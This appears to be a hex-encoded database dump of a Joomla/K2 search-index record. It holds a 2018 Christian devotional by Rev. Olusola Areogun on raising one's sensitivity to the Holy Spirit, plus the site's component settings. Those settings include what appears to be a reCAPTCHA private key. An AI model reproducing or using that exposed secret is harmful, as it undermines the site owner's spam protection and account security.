0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223631223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d32362d30382d32303138223b733a373a2273756d6d617279223b733a3235343a223c703e446561726c792042656c6f7665642c3c2f703e0d0a3c703e454e48414e43494e4720594f55522053454e534954495649545920544f2054484520484f4c5920535049524954206973206f6e65206f6620746865207761797320746f20627265616b20696e746f20746865207265616c6d206f6620657863656564696e67206162756e64616e746c792061626f7665206c6966652e3c2f703e0d0a3c703e3c7370616e206c616e673d22454e2d4742223e54686572652061726520666f7572206c6576656c73206f662073656e7369746976697479207468617420697320617661696c61626c6520746f206d616e3a3c2f7370616e3e3c2f703e0d0a223b733a343a22626f6479223b733a333639343a220d0a3c703e3c7370616e206c616e673d22454e2d4742223e312e204e6f2073656e736974697669747920617420616c6c3c2f7370616e3e3c2f703e0d0a3c703e3c7370616e206c616e673d22454e2d4742223e54686973206973207768656e2074686520706572736f6e2069732064656e73652073706972697475616c6c792e204120626f726e20616761696e206d616e2063616e2067657420746f207468617420706c616365206966206865206973206e6f74206361726566756c2e203c2f7370616e3e3c2f703e0d0a3c703e3c7370616e206c616e673d22454e2d4742223e322e204c6f772073656e7369746976697479203c2f7370616e3e3c2f703e0d0a3c703e3c7370616e206c616e673d22454e2d4742223e4a61636f62207361696420696e2047656e657369732032363a31382c20e2809c3c2f7370616e3e537572656c7920746865204c4f524420697320696e207468697320706c6163652c20616e64204920646964206e6f74206b6e6f772069742e22203c7370616e206c616e673d22454e2d4742223e54686174206973206c6f772073656e73697469766974792e203c2f7370616e3e3c2f703e0d0a3c703e3c7370616e206c616e673d22454e2d4742223e332e2053656e736974697665203c2f7370616e3e3c2f703e0d0a3c703e3c7370616e206c616e673d22454e2d4742223e342e20486967682073656e73697469766974793c2f7370616e3e3c2f703e0d0a3c703e3c7370616e206c616e673d22454e2d4742223e4f7574206f6620746865736520666f7572206c6576656c73206f662073656e73697469766974792c2074776f206172652064616e6765726f75733a206c6f7720616e64206e6f2073656e73697469766974792e20536f6d652070656f706c652061726520776f726b696e6720696e206120706c6163652074686174207468652077696e647320616e64207468652064616e676572207468657265207265717569726520612068696768206c6576656c206f662073656e736974697669747920666f72207468656d20746f20737572766976652e20496620796f752061726520676f696e6720746f20626520612073656e696f72206d696c6974617279206f6666696365722c20612073656e696f7220706f6c696365206f666669636572206574632e2c20796f75206e656564206120686967682073656e73697469766974792e20466f7220796f7520746f20626520616e20656666656374697665206d696e6973746572206f662074686520476f7370656c2c20796f75206e65656420686967682073656e73697469766974792e203c2f7370616e3e3c2f703e0d0a3c703e3c7370616e206c616e673d22454e2d4742223e5072617920666f7220796f757273656c66207468617420476f6420697320676f696e6720746f206261707469736520796f75207769746820612068696768206c6576656c206f662073656e73697469766974792e2045766572797468696e6720746861742068617320746f20646f207769746820796f75722067726561746e6573732077696c6c206e6f7420636f6d65207468726f75676820796f7572207374727567676c6520627574207468726f75676820796f75722073656e73697469766974792e204974e2809973206e6f74206a75737420616e79206a6f62207468617420697320616c726967687420666f7220796f752062757420796f75206e6565642073656e736974697669747920746f206b6e6f7720746865207269676874206a6f622e2050656f706c65206d617920776f6e646572206174206120646f63746f7220676f696e6720696e746f20686f74656c20627573696e6573732c20627574207468617420636f756c642062652073656e73697469766974792067756964696e672068696d206576656e2074686f75676820697420646f65736ee280997420736f756e64206e6f726d616c2e2053656e73697469766974792069732077686174206d616b657320796f7520746f2063726f73732066726f6d2061206e6f726d616c206c69666520746f2061206772656174206c6966652e3c2f7370616e3e3c2f703e0d0a3c703e3c7370616e206c616e673d22454e2d4742223e486967686c6967687465642062656c6f772061726520736f6d65206f662074686520737465707320746f20454e48414e43494e4720594f55522053454e534954495649545920544f2054484520484f4c59205350495249543a3c2f7370616e3e3c2f703e0d0a3c703e3c7370616e206c616e673d22454e2d4742223ec2a0312e204d61696e7461696e2061207075726520636f6e736369656e63653c2f7370616e3e3c2f703e0d0a3c703e322e2046656564206d6f7265206f6e2074686520776f7264206f6620476f643c2f703e0d0a3c703e332e20496e63726561736520796f757220636f6e66657373696f6e206f662074686520776f7264206f6620476f643c2f703e0d0a3c703e342e204661737420726567756c61726c792d2066617374696e6720656e68616e63657320796f75722061776172656e657373206f662074686520737069726974207265616c6d2e204974206d616b6573206974206561737920666f7220796f7520746f20666c6f7720696e2074686520737069726974207265616c6d2e204e6f7468696e672069732061732069742061707065617273207768657468657220676f6f64206f72206261642e20596f75206d6179206e65656420746f20646f20617761792077697468206d65616c7320736f6d6574696d65732e3c2f703e0d0a3c703e476f64206c6976657320696e206120776f726c64207468617420616c6c207468696e677320617265206e6f772e20476f6420697320696e207965737465726461792c20746f64617920616e6420746f6d6f72726f772e3c2f703e0d0a3c703e57687920646f6e277420796f75206c65742048696d2073686172652074686174207769746820796f753f2048652063616e2074656c6c20796f75207768617420746f20646f20746861742077696c6c2067756172616e74656520796f75203130207965617273206f66206162756e64616e636520616e64207374726573732d66726565206c6966652e3c2f703e0d0a3c703ec2a03c2f703e0d0a3c703e352e205374617920617761792066726f6d20756e616e6f696e7465642061746d6f7370686572652d2069742063616e2064656164656e20796f7572207370697269742e2041766f69642066616c6c696e672061736c65657020696e2066726f6e74206f662054562e2050726163746963652070757474696e6720776f727368697020736f6e677320746f20706c6179206f72206c697374656e20746f2061206d65737361676520617320796f752066616c6c2061736c6565702e3c2f703e0d0a3c703ec2a03c2f703e0d0a3c703e362e204d61696e7461696e20636c6f736520636f6e7461637420776974682061757468656e74696320676966747320616e642063616c6c696e6773206f662074686520486f6c79205370697269742e20596f752063616ee28099742062652072756262696e672073706972697420776974682064656164207370697269747320616e642065786365707420746f206265207368617270656e65642e3c2f703e0d0a3c703ec2a03c2f703e0d0a3c703e372d20416c6c6f7720746865206672756974206f662074686520486f6c792053706972697420746f20776f726b20696e20796f7572206c6966652e20546861742069732074686520706c6163652063686172616374657220697320666f726d65642e2041206d616e206d616e6966657374696e6720746865206769667473206f6620746865205370697269742077697468206e6f20636861726163746572206973206e6f74207361666520616e642068652077696c6c206e6f74206c61737420696e20686973206a6f75726e657920776974682074686520486f6c79205370697269742e20476f6420697320636f6d6d697474656420746f2061206d616e2077697468206368617261637465722c207468616e2061206d616e207769746820676966747320616e64206e6f206368617261637465722e3c2f703e0d0a3c703ec2a03c2f703e0d0a3c703e382e2041766f6964206e656761746976652070617373696f6e2e204974207265647563657320796f75722073656e736974697669747920746f2074686520486f6c79205370697269742e20596f752063616e6e6f74206265206d6f6f647920616e642062652073656e73697469766520746f2074686520486f6c792047686f73742e204265206361726566756c207768617420796f7520737065616b20696e207468652068656174206f66206e656761746976652070617373696f6e2e204d6f73742070656f706c652074686174207969656c6420746f206e656761746976652070617373696f6e20646f206e6f7420686176652074686520666c6f772e204c6561726e20746f207969656c6420746f20706f7369746976652070617373696f6e732e3c2f703e0d0a3c703ec2a03c2f703e0d0a3c703e392e2041766f69642077726f6e67206173736f63696174696f6e2c20756e676f646c7920616e6420756e686f6c7920616c6c69616e6365732e3c2f703e0d0a3c703ec2a03c2f703e0d0a3c703e31302e20507261637469736520696e7374616e74206f62656469656e636520746f2074686520486f6c79205370697269742e20546869732077696c6c20686569676874656e20796f7572207369676e616c732e204469736f62656469656e636520746f2074686520486f6c79205370697269742077696c6c20656d6261727261737320796f7520736f6d6577686572652e20476976696e67206865656420746f206c79696e67207370697269742077696c6c207765616b656e20796f75722073656e73697469766974792e3c2f703e0d0a3c703ec2a03c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375732e3c2f703e0d0a3c703e476f64e28099732053657276616e742c3c2f703e0d0a3c703e5265762e204f6c75736f6c61204172656f67756e2e3c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31313a226d6f6469666965645f6279223b733a313a2230223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223330223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2236313a66726f6d2d6f75722d6661746865722d732d68656172742d32362d30382d32303138223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f36312d66726f6d2d6f75722d6661746865722d732d68656172742d32362d30382d32303138223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3631223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d36313a66726f6d2d6f75722d6661746865722d732d68656172742d32362d30382d32303138223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202832362f30382f3230313829223b733a31313a226465736372697074696f6e223b733a3230353a2220446561726c792042656c6f7665642c20454e48414e43494e4720594f55522053454e534954495649545920544f2054484520484f4c5920535049524954206973206f6e65206f6620746865207761797320746f20627265616b20696e746f20746865207265616c6d206f6620657863656564696e67206162756e64616e746c792061626f7665206c6966652e2054686572652061726520666f7572206c6576656c73206f662073656e7369746976697479207468617420697320617661696c61626c6520746f206d616e3a20223b733a393a227075626c6973686564223b